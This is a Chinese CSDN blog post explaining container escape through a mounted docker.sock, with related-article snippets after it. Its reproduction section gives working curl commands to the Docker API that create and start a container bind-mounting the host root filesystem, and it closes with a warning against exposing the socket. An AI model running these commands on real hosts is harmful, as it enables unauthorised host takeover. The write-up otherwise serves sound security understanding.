docker.sock 危险挂载逃逸

最新推荐文章于 2024-07-17 14:06:57 发布
最新推荐文章于 2024-07-17 14:06:57 发布
阅读量584 收藏 8
点赞数 5
文章标签: docker 容器 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31610083/article/details/135796593
版权
文章详细描述了一种利用docker.sock进行逃逸攻击的方法,通过在宿主机上部署后门容器,从而控制主机。作者分析了漏洞利用路径,包括检查套接字、创建和启动容器的过程。警告了docker.sock暴露的风险。
摘要由CSDN通过智能技术生成

docker.sock 危险挂载逃逸

一、漏洞简介

通过本地docker.sock向宿主机部署后门容器,以控制宿主机。

二、前置知识

docker.sock

/var/run/docker.sockDoceker Daemon默认监听的Unix域套接字,用于与容器中的进程通信。该监听操作的配置可以在/etc/default/docker中找到:

-H unix:///var/run/docker.sock

向该套接字发送的HTTP请求会转发给Docker Daemon,等同于在本地控制Docker Daemon。因此,挂载了docker.sock套接字的容器权限很高。

三、漏洞利用路径

  1. 检查docker.sock:检查路径是否存在;发送GET请求info页面
  2. 拉取镜像:向docker.sock发送POST请求“create?fromImage”
  3. 创建容器:向docker.sock发送POST请求“containers/create”,容器通过JSON配置
  4. 启动容器:向docker.sock发送POST请求“containers/“+containerID+”/start”

四、漏洞复现

漏洞复现过程:

# 在挂载了/var/run/docker.sock的容器中
# 拉取镜像
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json' \
http://<docker_host>:PORT/images/create?fromImage=alpine&tag=latest
# 创建容器并记录返回的容器ID(container_ID)
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json' \
--data-binary '{"Hostname": "","Domainname": "","User": "","AttachStdin": true,"AttachStdout": true,"AttachStderr": true,"Tty": true,"OpenStdin": true,"StdinOnce": true,"Entrypoint": "/bin/bash","Image": "alpine","Volumes": {"/hostos/": {}},"HostConfig": {"Binds": ["/:/hostos"]}}' \
http://<docker_host>:PORT/containers/create
# 启动容器
curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/json' \
http://<docker_host>:PORT/containers/<container_ID>/start

如果是本地利用,将<docker_host>:PORT替换为localhost即可。

五、总结

将docker.sock暴露在容器中是很危险的行为,可能导致容器被利用来发起逃逸攻击以控制主机。本文分析了挂载docker.sock套接字的逃逸攻击原理和复现过程。

参考链接

根本不是咖啡猫
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
docker容器挂载docker.sock,在容器内部直接与docker守护进程通信进行接口调用
weixin_30663471的博客
05-17 1774
一、docker container实现 1、docker容器启动时挂载docker.sock docker run -it --rm -v /var/run/docker.sock:/var/run/docker.sock centos:7.6.1810 2、curl调用接口 curl -s --unix-socket /var/run/docker.sock http://...
ubuntu vps安装docker报错:Cannot connect to the Docker daemon at unix:///var/run/docker.sock.问题解决
09-30
在Ubuntu VPS上安装Docker时,可能会遇到一个常见的错误:“Cannot connect to the Docker daemon at unix:///var/run/docker.sock.” 这个问题通常是由于Docker守护进程未运行或者是由于Linux内核版本过低导致的。...
docker的/var/run/docker.sock参数
热门推荐
程序员欣宸的博客
06-22 3万+
/var/run/docker.sock是运行docker容器时常用的数据卷参数,本文就来学习这个参数的用处,揭示背后的原理。
docker启动卡死-docker.sock解决方法
wudongfang666的专栏
12-22 148
docker的/var/run/docker.sock参数 作用是什么
最新发布
chaoren499的专栏
07-17 352
在使用Docker命令行工具或者Docker API时,都会通过这个套接字与Docker守护进程进行通信。-v /var/run/docker.sock:/var/run/docker.sock 的作用是什么。通过这个套接字,可以通过发送命令和接收结果来与Docker守护进程交互。如果你的容器需要操作 docker 的资源,那么这个参数必须要有的。是Docker守护进程的Unix套接字(Unix Socket)。其实这是容器docker 进程之间通信用的。它是用于与Docker守护进程通信的一种机制。
docker.socker
weixin_39548163的博客
04-15 1358
在电脑上运行的docker由client和server组成,我们输入docker version命令实际上是通过客户端将请求发送到同一台电脑上的Doceker Daemon服务,由Docker Daemon返回信息,客户端收到信息后展示在控制台上,来自stack overflow的架构图如下: 而daemon默认监听的是/var/run/docker.sock这个套接字文件,所以docker客户端只要把请求发往这里,daemon就能收到并且做出响应,也就可以实现docker ps,docker .
docker socket设置
爱吃鱼的小明的博客
10-25 6225
docker socket设置 参考 在 docker 的官方文档中, 介绍了三种访问 docker Remote API 的方式, 分别是 unix 套接字文件/ tcp 监听端口和 fd 文件描述符. 由于 docker 默认会为我们开启本地 socket 套接字(/var/run/docker.sock) 所以本篇文章主要介绍如何让 docker 监听 tcp端口 在 docker 配置文件中设置 docker 1.12 版本之后, 建议在 docker 的 js 配置文件中配置, 路径为 /etc/
docker指定sock
SHELLCODE_8BIT的博客
01-25 517
docker -H unix:///tmp/docker.sock ps
执行Docker images命令,出现Docker deamon at unix:///var/run/docker.sock.Is the docker deamon running?
凤凰涅槃
06-20 1784
Docker上安装数据库MySQL时,执行Docker images时 出现: Docker deamon at unix:///var/run/docker.sock.Is the docker deamon running? 问题原因:Docker服务没有启动启动docker服务,执行: service docker start 再次执行 docker images 可以看到本机
Win10 WSL运行docker报错:Cannot connect to the Docker daemon at unix:///var/run/docker.sock.
01-20
在Windows 10中使用Windows Subsystem for Linux (WSL) 运行Docker时,可能会遇到“Cannot connect to the Docker daemon at unix:///var/run/docker.sock.”的错误。这个错误通常意味着Docker守护进程(Docker ...
DockerPwn.py:Docker.sock滥用的Python自动化
04-15
DockerPwn.py 用于滥用暴露的Docker TCP套接字的自动化。 这将在安装了主机根文件系统的Docker主机上自动创建一个容器,从而允许对主机文件系统进行任意读写(这很不好)。 创建后,脚本将使用您选择的方法来获取根...
boot2docker.isov19.03.12
07-14
boot2docker.iso docker 最新版本镜像文件v19.03.12.在github上下载太慢以及下载不下来。放到csdn 上方便快速下载使用
Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running?
wangbyby
07-22 658
我用的wsl 安装docker 参考https://blog.csdn.net/xie1xiao1jun/article/details/79413436 我当时apt出现了小问题, 解决方案 docker启动 1. 遇到问题 Cannot connect to the Docker daemon at unix:///var/run/docker.sock. Is the docker daemon running? 2. 解决方案 管理员重新启动wsl 运行sudo service docker st
关于/var/run/docker.sock那些事儿
qq_42997214的博客
02-17 5450
一旦涉及到docker,经常会发现有时会需要挂载文件 /var/run/docker.sock docker是client+server架构,使用命令docker version就可看出 docker由client和server组成,输入docker version命令实,际上是通过客户端将请求发送到docker的守护进程doceker daemon服务上,由docker daemon返回信息,客户端收到信息后展示在控制台上。 相当于一个server,监听来自/var/run/docker.sock的请求,
Docker挂载逃逸原理复现分析到BlueMoon实战
二狗的博客
02-20 318
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的Linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。正因为docker属于沙箱机制,所以当获得docker容器的权限时与获得宿主机权限是两个概念。
云上攻防-云原生篇&Docker安全&权限环境检测&容器逃逸&特权模式&危险挂载
今天是几号的博客
10-13 2905
Docker 是一个开放源代码软件,是一个开放平台,用于开发应用、交付(shipping)应用、运行应用。Docker允许用户将基础设施(Infrastructure)中的应用单独分割出来,形成更小的颗粒(容器),从而提高交付软件的速度。Docker 容器与虚拟机类似,但二者在原理上不同,容器是将操作系统层虚拟化,虚拟机则是虚拟化硬件,因此容器更具有便携性、高效地利用服务器。
生命在于学习——docker逃逸
易水哲的博客
12-02 4794
docker逃逸就是从当前docker容器权限中逃逸出来,获得宿主机的权限。
无法找到docker.sock
leechm的博客
07-16 2746
因为如果直接使用dockerd命令的话,docker命令正常,因此我们直接把socket的路径写到service文件中即可。原因是:没有生成/var/run/docker.sock。然后无法使用docker
volumes: - /var/run/docker.sock:/var/run/docker.sock
07-29
Docker中,使用-v参数可以将主机的文件或目录挂载容器中。其中,/var/run/docker.sockDocker守护进程的UNIX套接字文件,它提供了与Docker守护进程通信的接口。通过将/var/run/docker.sock挂载容器中,容器可以与宿主机上的Docker守护进程进行通信,从而实现一些特定的功能。例如,可以在容器中运行Docker命令,或者在容器中创建和管理其他容器。这在一些特定的场景下非常有用,比如在容器中运行CI/CD工具时,可以通过挂载/var/run/docker.sock来实现构建和部署容器的功能。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* *3* [[转载] Docker in Docker(实际上是 Docker outside Docker): /var/run/docker.sock](https://blog.csdn.net/xzl9811wl/article/details/106888092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [docker的/var/run/docker.sock参数](https://blog.csdn.net/boling_cavalry/article/details/92846483)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值